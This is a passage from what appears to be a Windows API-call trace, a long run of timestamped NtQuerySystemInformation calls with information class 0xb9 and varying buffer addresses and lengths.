(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0229.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0229.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x58, ResultLength=0x0) [0229.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x28, ResultLength=0x0) [0229.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.837] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0229.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcea0, Length=0x20, ResultLength=0x0) [0229.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcea0, Length=0x20, ResultLength=0x0) [0229.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcea0, Length=0x20, ResultLength=0x0) [0229.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.838] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0229.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x58, ResultLength=0x0) [0229.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.839] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.841] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0229.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x28, ResultLength=0x0) [0229.842] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.843] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.845] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0229.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0229.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0229.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0229.846] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0229.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0229.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x58, ResultLength=0x0) [0229.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.847] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0229.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.849] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0229.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.851] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0229.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0229.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0229.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.852] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x28, ResultLength=0x0) [0229.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0229.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0229.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.853] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0229.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0229.855] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0229.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0229.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.856] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcec0, Length=0x20, ResultLength=0x0) [0229.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0229.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0229.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0229.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0229.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0229.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0229.857] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.858] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0229.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0229.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf40, Length=0x20, ResultLength=0x0) [0229.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf40, Length=0x20, ResultLength=0x0) [0229.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.859] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a8, Length=0x50, ResultLength=0x0) [0229.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.860] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x38, ResultLength=0x0) [0229.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0229.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.861] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0229.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0229.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0229.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0229.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0229.862] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) 